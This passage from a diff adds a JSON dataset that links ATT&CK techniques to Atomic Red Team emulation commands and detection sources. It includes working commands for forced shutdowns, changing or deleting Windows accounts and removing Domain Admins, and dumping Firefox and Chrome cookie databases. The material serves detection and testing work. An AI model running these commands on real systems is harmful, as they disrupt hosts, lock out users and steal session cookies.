"macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + } + ], + "external_reference": [ + [ + "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1529", + "command_list": [ + null, + "shutdown -r now\n", + "shutdown -h now\n", + "reboot\n", + "halt -p\n", + "halt --reboot\n", + "poweroff\n", + "poweroff --reboot\n" + ], + "commands": [ + { + "command": null, + "source": "atomics/T1529/T1529.yaml", + "name": "Atomic Red Team Test - System Shutdown/Reboot" + }, + { + "command": "shutdown -r now\n", + "source": "atomics/T1529/T1529.yaml", + "name": "Atomic Red Team Test - System Shutdown/Reboot" + }, + { + "command": "shutdown -h now\n", + "source": "atomics/T1529/T1529.yaml", + "name": "Atomic Red Team Test - System Shutdown/Reboot" + }, + { + "command": "reboot\n", + "source": "atomics/T1529/T1529.yaml", + "name": "Atomic Red Team Test - System Shutdown/Reboot" + }, + { + "command": "halt -p\n", + "source": "atomics/T1529/T1529.yaml", + "name": "Atomic Red Team Test - System Shutdown/Reboot" + }, + { + "command": "halt --reboot\n", + "source": "atomics/T1529/T1529.yaml", + "name": "Atomic Red Team Test - System Shutdown/Reboot" + }, + { + "command": "poweroff\n", + "source": "atomics/T1529/T1529.yaml", + "name": "Atomic Red Team Test - System Shutdown/Reboot" + }, + { + "command": "poweroff --reboot\n", + "source": "atomics/T1529/T1529.yaml", + "name": "Atomic Red Team Test - System Shutdown/Reboot" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1529", + "display_name": "System Shutdown/Reboot", + "atomic_tests": [ + { + "name": "Shutdown System - Windows", + "auto_generated_guid": "ad254fa8-45c0-403b-8c77-e00b3d3e7a64", + "description": "This test shuts down a Windows system.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "timeout": { + "description": "Timeout period before shutdown (seconds)", + "type": "Integer", + "default": 1 + } + }, + "executor": { + "command": "shutdown /s /t #{timeout}\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Restart System - Windows", + "auto_generated_guid": "f4648f0d-bf78-483c-bafc-3ec99cd1c302", + "description": "This test restarts a Windows system.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "timeout": { + "description": "Timeout period before restart (seconds)", + "type": "Integer", + "default": 1 + } + }, + "executor": { + "command": "shutdown /r /t #{timeout}\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Restart System via `shutdown` - macOS/Linux", + "auto_generated_guid": "6326dbc4-444b-4c04-88f4-27e94d0327cb", + "description": "This test restarts a macOS/Linux system.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "timeout": { + "description": "Time to restart (can be minutes or specific time)", + "type": "String", + "default": "now" + } + }, + "executor": { + "command": "shutdown -r #{timeout}\n", + "name": "bash", + "elevation_required": true + } + }, + { + "name": "Shutdown System via `shutdown` - macOS/Linux", + "auto_generated_guid": "4963a81e-a3ad-4f02-adda-812343b351de", + "description": "This test shuts down a macOS/Linux system using a halt.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "timeout": { + "description": "Time to shutdown (can be minutes or specific time)", + "type": "String", + "default": "now" + } + }, + "executor": { + "command": "shutdown -h #{timeout}\n", + "name": "bash", + "elevation_required": true + } + }, + { + "name": "Restart System via `reboot` - macOS/Linux", + "auto_generated_guid": "47d0b042-a918-40ab-8cf9-150ffe919027", + "description": "This test restarts a macOS/Linux system via `reboot`.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "executor": { + "command": "reboot\n", + "name": "bash", + "elevation_required": true + } + }, + { + "name": "Shutdown System via `halt` - Linux", + "auto_generated_guid": "918f70ab-e1ef-49ff-bc57-b27021df84dd", + "description": "This test shuts down a Linux system using `halt`.\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "halt -p\n", + "name": "bash", + "elevation_required": true + } + }, + { + "name": "Reboot System via `halt` - Linux", + "auto_generated_guid": "78f92e14-f1e9-4446-b3e9-f1b921f2459e", + "description": "This test restarts a Linux system using `halt`.\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "halt --reboot\n", + "name": "bash", + "elevation_required": true + } + }, + { + "name": "Shutdown System via `poweroff` - Linux", + "auto_generated_guid": "73a90cd2-48a2-4ac5-8594-2af35fa909fa", + "description": "This test shuts down a Linux system using `poweroff`.\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "poweroff\n", + "name": "bash", + "elevation_required": true + } + }, + { + "name": "Reboot System via `poweroff` - Linux", + "auto_generated_guid": "61303105-ff60-427b-999e-efb90b314e41", + "description": "This test restarts a Linux system using `poweroff`.\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "poweroff --reboot\n", + "name": "bash", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "sensor health", + "definition": "Information associated with sensors providing data about host system status.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "host status", + "description": "Data from a sensor about the health of a host system sensor", + "source_data_element": "sensor health", + "relationship": "contained", + "target_data_element": "host system status" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + null + ] + }, + { + "technique_id": "T1531", + "command_list": [ + "net user AtomicAdministrator #{new_user_password} /add\nnet.exe user AtomicAdministrator #{new_password}\n", + "net user #{user_account} User2ChangePW! /add\nnet.exe user #{user_account} #{new_password}\n", + "net user #{user_account} #{new_user_password} /add\nnet.exe user #{user_account} HuHuHUHoHo283283@dJD\n", + "net user #{user_account} User2DeletePW! /add\nnet.exe user #{user_account} /delete\n", + "net user AtomicUser #{new_user_password} /add\nnet.exe user AtomicUser /delete\n", + "$PWord = ConvertTo-SecureString -String #{super_pass} -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList domain\\super_user, $PWord\nif((Get-ADUser #{remove_user} -Properties memberof).memberof -like \"CN=Domain Admins*\"){\n Remove-ADGroupMember -Identity \"Domain Admins\" -Members #{remove_user} -Credential $Credential -Confirm:$False\n} else{\n write-host \"Error - Make sure #{remove_user} is in the domain admins group\" -foregroundcolor Red\n}\n", + "$PWord = ConvertTo-SecureString -String password -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #{super_user}, $PWord\nif((Get-ADUser #{remove_user} -Properties memberof).memberof -like \"CN=Domain Admins*\"){\n Remove-ADGroupMember -Identity \"Domain Admins\" -Members #{remove_user} -Credential $Credential -Confirm:$False\n} else{\n write-host \"Error - Make sure #{remove_user} is in the domain admins group\" -foregroundcolor Red\n}\n", + "$PWord = ConvertTo-SecureString -String #{super_pass} -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #{super_user}, $PWord\nif((Get-ADUser remove_user -Properties memberof).memberof -like \"CN=Domain Admins*\"){\n Remove-ADGroupMember -Identity \"Domain Admins\" -Members remove_user -Credential $Credential -Confirm:$False\n} else{\n write-host \"Error - Make sure remove_user is in the domain admins group\" -foregroundcolor Red\n}\n" + ], + "commands": [ + { + "command": "net user AtomicAdministrator #{new_user_password} /add\nnet.exe user AtomicAdministrator #{new_password}\n", + "source": "atomics/T1531/T1531.yaml", + "name": "Atomic Red Team Test - Account Access Removal" + }, + { + "command": "net user #{user_account} User2ChangePW! /add\nnet.exe user #{user_account} #{new_password}\n", + "source": "atomics/T1531/T1531.yaml", + "name": "Atomic Red Team Test - Account Access Removal" + }, + { + "command": "net user #{user_account} #{new_user_password} /add\nnet.exe user #{user_account} HuHuHUHoHo283283@dJD\n", + "source": "atomics/T1531/T1531.yaml", + "name": "Atomic Red Team Test - Account Access Removal" + }, + { + "command": "net user #{user_account} User2DeletePW! /add\nnet.exe user #{user_account} /delete\n", + "source": "atomics/T1531/T1531.yaml", + "name": "Atomic Red Team Test - Account Access Removal" + }, + { + "command": "net user AtomicUser #{new_user_password} /add\nnet.exe user AtomicUser /delete\n", + "source": "atomics/T1531/T1531.yaml", + "name": "Atomic Red Team Test - Account Access Removal" + }, + { + "command": "$PWord = ConvertTo-SecureString -String #{super_pass} -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList domain\\super_user, $PWord\nif((Get-ADUser #{remove_user} -Properties memberof).memberof -like \"CN=Domain Admins*\"){\n Remove-ADGroupMember -Identity \"Domain Admins\" -Members #{remove_user} -Credential $Credential -Confirm:$False\n} else{\n write-host \"Error - Make sure #{remove_user} is in the domain admins group\" -foregroundcolor Red\n}\n", + "source": "atomics/T1531/T1531.yaml", + "name": "Atomic Red Team Test - Account Access Removal" + }, + { + "command": "$PWord = ConvertTo-SecureString -String password -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #{super_user}, $PWord\nif((Get-ADUser #{remove_user} -Properties memberof).memberof -like \"CN=Domain Admins*\"){\n Remove-ADGroupMember -Identity \"Domain Admins\" -Members #{remove_user} -Credential $Credential -Confirm:$False\n} else{\n write-host \"Error - Make sure #{remove_user} is in the domain admins group\" -foregroundcolor Red\n}\n", + "source": "atomics/T1531/T1531.yaml", + "name": "Atomic Red Team Test - Account Access Removal" + }, + { + "command": "$PWord = ConvertTo-SecureString -String #{super_pass} -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #{super_user}, $PWord\nif((Get-ADUser remove_user -Properties memberof).memberof -like \"CN=Domain Admins*\"){\n Remove-ADGroupMember -Identity \"Domain Admins\" -Members remove_user -Credential $Credential -Confirm:$False\n} else{\n write-host \"Error - Make sure remove_user is in the domain admins group\" -foregroundcolor Red\n}\n", + "source": "atomics/T1531/T1531.yaml", + "name": "Atomic Red Team Test - Account Access Removal" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1531", + "display_name": "Account Access Removal", + "atomic_tests": [ + { + "name": "Change User Password - Windows", + "auto_generated_guid": "1b99ef28-f83c-4ec5-8a08-1a56263a5bb2", + "description": "Changes the user password to hinder access attempts. Seen in use by LockerGoga. Upon execution, log into the user account \"AtomicAdministrator\" with\nthe password \"HuHuHUHoHo283283\".\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "user_account": { + "description": "User account whose password will be changed.", + "type": "String", + "default": "AtomicAdministrator" + }, + "new_user_password": { + "description": "Password to use if user account must be created first", + "type": "String", + "default": "User2ChangePW!" + }, + "new_password": { + "description": "New password for the specified account.", + "type": "String", + "default": "HuHuHUHoHo283283@dJD" + } + }, + "executor": { + "command": "net user #{user_account} #{new_user_password} /add\nnet.exe user #{user_account} #{new_password}\n", + "cleanup_command": "net.exe user #{user_account} /delete >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Delete User - Windows", + "auto_generated_guid": "f21a1d7d-a62f-442a-8c3a-2440d43b19e5", + "description": "Deletes a user account to prevent access. Upon execution, run the command \"net user\" to verify that the new \"AtomicUser\" account was deleted.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "new_user_password": { + "description": "Password to use if user account must be created first", + "type": "String", + "default": "User2DeletePW!" + }, + "user_account": { + "description": "User account to be deleted.", + "type": "String", + "default": "AtomicUser" + } + }, + "executor": { + "command": "net user #{user_account} #{new_user_password} /add\nnet.exe user #{user_account} /delete\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Remove Account From Domain Admin Group", + "auto_generated_guid": "43f71395-6c37-498e-ab17-897d814a0947", + "description": "This test will remove an account from the domain admins group\n", + "supported_platforms": [ + "windows" + ], + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Requires the Active Directory module for powershell to be installed.\n", + "prereq_command": "if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1}\n", + "get_prereq_command": "Add-WindowsCapability -Online -Name \"Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0\"\n" + } + ], + "input_arguments": { + "super_user": { + "description": "Account used to run the execution command (must include domain).", + "type": "String", + "default": "domain\\super_user" + }, + "super_pass": { + "description": "super_user account password.", + "type": "String", + "default": "password" + }, + "remove_user": { + "description": "Account to remove from domain admins.", + "type": "String", + "default": "remove_user" + } + }, + "executor": { + "command": "$PWord = ConvertTo-SecureString -String #{super_pass} -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #{super_user}, $PWord\nif((Get-ADUser #{remove_user} -Properties memberof).memberof -like \"CN=Domain Admins*\"){\n Remove-ADGroupMember -Identity \"Domain Admins\" -Members #{remove_user} -Credential $Credential -Confirm:$False\n} else{\n write-host \"Error - Make sure #{remove_user} is in the domain admins group\" -foregroundcolor Red\n}\n", + "name": "powershell", + "elevation_required": false + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account deletion", + "description": "A user account was deleted.", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "requested modification of", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "service principal" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "enabled", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "disabled", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "locked", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "unlocked", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "granted access to", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "removed access from", + "target_data_element": "user" + }, + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory object modification", + "description": "An active directory service or object was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "ad object" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started" + ] + ] + }, + { + "technique_id": "T1539", + "command_list": [ + "stop-process -name \"firefox\" -force -erroraction silentlycontinue\n$CookieDBLocation = get-childitem -path \"$env:appdata\\Mozilla\\Firefox\\Profiles\\*\\cookies.sqlite\"\n\"select host, name, value, path, expiry, isSecure, isHttpOnly, sameSite from [moz_cookies];\" | cmd /c $env:temp\\sqlite-tools-win32-x86-3380200\\sqlite3.exe \"$CookieDBLocation\" | out-file -filepath \"#{output_file}\"\n", + "stop-process -name \"firefox\" -force -erroraction silentlycontinue\n$CookieDBLocation = get-childitem -path \"$env:appdata\\Mozilla\\Firefox\\Profiles\\*\\cookies.sqlite\"\n\"select host, name, value, path, expiry, isSecure, isHttpOnly, sameSite from [moz_cookies];\" | cmd /c #{sqlite3_path} \"$CookieDBLocation\" | out-file -filepath \"$env:temp\\T1539FirefoxCookies.txt\"\n", + "stop-process -name \"chrome\" -force -erroraction silentlycontinue\n\"select host_key, name, encrypted_value, path, expires_utc, is_secure, is_httponly from [Cookies];\" | cmd /c #{sqlite3_path} \"$env:localappdata\\Google\\Chrome\\User Data\\Default\\Network\\Cookies\" | out-file -filepath \"#{output_file}\"\n", + "stop-process -name \"chrome\" -force -erroraction silentlycontinue\n\"select host_key, name, encrypted_value, path, expires_utc, is_secure, is_httponly from [Cookies];\" | cmd /c $env:temp\\sqlite-tools-win32-x86-3380200\\sqlite3.exe \"#{cookie_db}\" | out-file -filepath \"#{output_file}\"\n", + "stop-process -name \"chrome\" -force -erroraction silentlycontinue\n\"select host_key, name, encrypted_value, path, expires_utc, is_secure, is_httponly from [Cookies];\" | cmd /c #{sqlite3_path} \"#{cookie_db}\" | out-file -filepath \"$env:temp\\T1539ChromeCookies.txt\"\n" + ], + "commands": [ + { + "command": "stop-process -name \"firefox\" -force -erroraction silentlycontinue\n$CookieDBLocation = get-childitem -path \"$env:appdata\\Mozilla\\Firefox\\Profiles\\*\\cookies.sqlite\"\n\"select host, name, value, path, expiry, isSecure, isHttpOnly, sameSite from [moz_cookies];\" | cmd /c $env:temp\\sqlite-tools-win32-x86-3380200\\sqlite3.exe \"$CookieDBLocation\" | out-file -filepath \"#{output_file}\"\n", + "source": "atomics/T1539/T1539.yaml", + "name": "Atomic Red Team Test - Steal Web Session Cookie" + }, + { + "command": "stop-process -name \"firefox\" -force -erroraction silentlycontinue\n$CookieDBLocation = get-childitem -path \"$env:appdata\\Mozilla\\Firefox\\Profiles\\*\\cookies.sqlite\"\n\"select host, name, value, path, expiry, isSecure, isHttpOnly, sameSite from [moz_cookies];\" | cmd /c #{sqlite3_path} \"$CookieDBLocation\" | out-file -filepath \"$env:temp\\T1539FirefoxCookies.txt\"\n", + "source": "atomics/T1539/T1539.yaml", + "name": "Atomic Red Team Test - Steal Web Session Cookie" + }, + { + "command": "stop-process -name \"chrome\" -force -erroraction silentlycontinue\n\"select host_key, name, encrypted_value, path, expires_utc, is_secure, is_httponly from [Cookies];\" | cmd /c #{sqlite3_path} \"$env:localappdata\\Google\\Chrome\\User Data\\Default\\Network\\Cookies\" | out-file -filepath \"#{output_file}\"\n", + "source": "atomics/T1539/T1539.yaml", + "name": "Atomic Red Team Test - Steal Web Session Cookie" + }, + { + "command": "stop-process -name \"chrome\" -force -erroraction silentlycontinue\n\"select host_key, name, encrypted_value, path, expires_utc, is_secure, is_httponly from [Cookies];\" | cmd /c $env:temp\\sqlite-tools-win32-x86-3380200\\sqlite3.exe \"#{cookie_db}\" | out-file -filepath \"#{output_file}\"\n", + "source": "atomics/T1539/T1539.yaml", + "name": "Atomic Red Team Test - Steal Web Session Cookie" + }, + { + "command": "stop-process -name \"chrome\" -force -erroraction silentlycontinue\n\"select host_key, name, encrypted_value, path, expires_utc, is_secure, is_httponly from [Cookies];\" | cmd /c #{sqlite3_path} \"#{cookie_db}\" | out-file -filepath \"$env:temp\\T1539ChromeCookies.txt\"\n", + "source": "atomics/T1539/T1539.yaml", + "name": "Atomic Red Team Test - Steal Web Session Cookie" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1539", + "display_name": "Steal Web Session Cookie", + "atomic_tests": [ + { + "name": "Steal Firefox Cookies (Windows)", + "auto_generated_guid": "4b437357-f4e9-4c84-9fa6-9bcee6f826aa", + "description": "This test queries Firefox's cookies.sqlite database to steal the cookie data contained within it, similar to Zloader/Zbot's cookie theft function. \nNote: If Firefox is running, the process will be killed to ensure that the DB file isn't locked. \nSee https://www.malwarebytes.com/resources/files/2020/05/the-silent-night-zloader-zbot_final.pdf. \n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "sqlite3_path": { + "description": "Path to sqlite3", + "type": "Path", + "default": "$env:temp\\sqlite-tools-win32-x86-3380200\\sqlite3.exe" + }, + "output_file": { + "description": "Filepath to output cookies", + "type": "Path", + "default": "$env:temp\\T1539FirefoxCookies.txt" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Sqlite3 must exist at (#{sqlite3_path})\n", + "prereq_command": "if (Test-Path #{sqlite3_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"https://www.sqlite.org/2022/sqlite-tools-win32-x86-3380200.zip\" -OutFile \"$env:temp\\sqlite.zip\"\nExpand-Archive -path \"$env:temp\\sqlite.zip\" -destinationpath \"$env:temp\\\" -force\n" + } + ], + "executor": { + "command": "stop-process -name \"firefox\" -force -erroraction silentlycontinue\n$CookieDBLocation = get-childitem -path \"$env:appdata\\Mozilla\\Firefox\\Profiles\\*\\cookies.sqlite\"\n\"select host, name, value, path, expiry, isSecure, isHttpOnly, sameSite from [moz_cookies];\" | cmd /c #{sqlite3_path} \"$CookieDBLocation\" | out-file -filepath \"#{output_file}\"\n", + "cleanup_command": "remove-item #{output_file} -erroraction silentlycontinue\n", + "name": "powershell", + "elevation_required": false + } + }, + { + "name": "Steal Chrome Cookies (Windows)", + "auto_generated_guid": "26a6b840-4943-4965-8df5-ef1f9a282440", + "description": "This test queries Chrome's SQLite database to steal the encrypted cookie data, designed to function similarly to Zloader/Zbot's cookie theft function. \nOnce an adversary obtains the encrypted cookie info, they could go on to decrypt the encrypted value, potentially allowing for session theft. \nNote: If Chrome is running, the process will be killed to ensure that the DB file isn't locked. \nSee https://www.malwarebytes.com/resources/files/2020/05/the-silent-night-zloader-zbot_final.pdf. \n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "cookie_db": { + "description": "Filepath for Chrome cookies database", + "type": "String", + "default": "$env:localappdata\\Google\\Chrome\\User Data\\Default\\Network\\Cookies" + }, + "sqlite3_path": { + "description": "Path to sqlite3", + "type": "Path", + "default": "$env:temp\\sqlite-tools-win32-x86-3380200\\sqlite3.exe" + }, + "output_file": { + "description": "Filepath to output cookies", + "type": "Path", + "default": "$env:temp\\T1539ChromeCookies.txt" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Sqlite3 must exist at (#{sqlite3_path})\n", + "prereq_command": "if (Test-Path #{sqlite3_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"https://www.sqlite.org/2022/sqlite-tools-win32-x86-3380200.zip\" -OutFile \"$env:temp\\sqlite.zip\"\nExpand-Archive -path \"$env:temp\\sqlite.zip\" -destinationpath \"$env:temp\\\" -force\n" + } + ], + "executor": { + "command": "stop-process -name \"chrome\" -force -erroraction silentlycontinue\n\"select host_key, name, encrypted_value, path, expires_utc, is_secure, is_httponly from [Cookies];\" | cmd /c #{sqlite3_path} \"#{cookie_db}\" | out-file -filepath \"#{output_file}\"\n", + "cleanup_command": "remove-item #{output_file}\n", + "name": "powershell", + "elevation_required": false + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + 